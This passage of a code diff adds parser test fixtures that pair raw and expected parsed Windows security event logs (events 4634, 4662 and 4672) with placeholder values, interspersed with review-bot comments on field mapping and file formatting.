(WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount 
Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit 
Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "event": { + "action": "Logoff", + "code": "4634", + "kind": "event", + "module": "security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:42:47.895000Z", + "action": { + "id": 4634, + "outcome": "success", + "properties": { + "LogonType": "3", + "TargetDomainName": "J_DOE", + "TargetLogonId": "0x5ed35bb6", + "TargetUserName": "ACCOUNT", + "TargetUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "J_DOE", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "J_DOE", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.jdoe.com", + "event_id": "4634", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x5ed35bb6", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 704, + "thread": { + "id": 6336 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "15983780774", + "task": "Logoff" + } + } +} \ No newline at end of file 
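Review bot: The expected `user.target` block near the end of this file carries `domain` and `name` but no `id`, although the input's `event_data.TargetUserSid` is `S-1-2-3` and the 4625 expectation earlier in this patch does pin `user.target.id`; if the parser is meant to mirror the target SID the way it does for 4625, the expectation should read `"target": {"domain": "J_DOE", "id": "S-1-2-3", "name": "ACCOUNT"}`, otherwise a correlation that joins logon and logoff on the target SID only works for one of the two events. Since 4634's `event_data` has only Target* fields, `user` and `user.target` are the same principal here, which deserves a one-line comment in the parser rather than being left implicit in this fixture. As a point of style, this file and the 4662, 4672, 4689 and 4720 fixtures are all committed without a trailing newline (`\ No newline at end of file`); adding one keeps future diffs clean.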
diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json new file mode 100644 index 000000000..3d80320f5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4662.json 
@@ -0,0 +1,105 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject 
Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object 
Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}" + }, + "expected": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType 
d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object 
Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": "%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + 
"SubjectLogonId": "0xc2b9d138", + "SubjectUserName": "ACCOUNT01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab", + "name": "ACCOUNT01", + "type": "winlogbeat", + "version": "8.12.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "account01", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "account01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "account01" + ], + "ip": [ + "1.2.3.4" + ] + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT01.domain.local", + "event_id": "4662", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0xc2b9d138" + }, + "opcode": "Informations", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "476080242", + "task": "Directory Service Access" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json new file mode 100644 index 000000000..59c3d35b3 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4672.json 
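Review bot: The expected output pins no `user.*` and no `related.user` for this 4662 event even though `event_data` carries `SubjectUserSid`, `SubjectUserName` and `SubjectDomainName`, while the 4672 and 4689 fixtures later in this patch map exactly those Subject* fields to `user.id`, `user.name`, `user.domain` and `related.user`. Directory-object access is an event defenders pivot on by the accessing account, so leaving it unmapped here looks like a gap rather than a choice; if the parser is extended, the expectation should gain `"user": {"domain": "DOMAIN", "id": "S-1-2-3", "name": "ACCOUNT01"}` and `"user": ["ACCOUNT01"]` under `related`, following the `$`-stripping the 4672 fixture pins. Note also that `AccessList` and `Properties` are pinned as raw `%%7688\n\t\t…` message-table strings, so any rule on the accessed property GUIDs has to parse embedded tabs and newlines; a list of GUIDs under a dedicated field would be directly matchable.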
@@ -0,0 +1,82 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + "kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": 
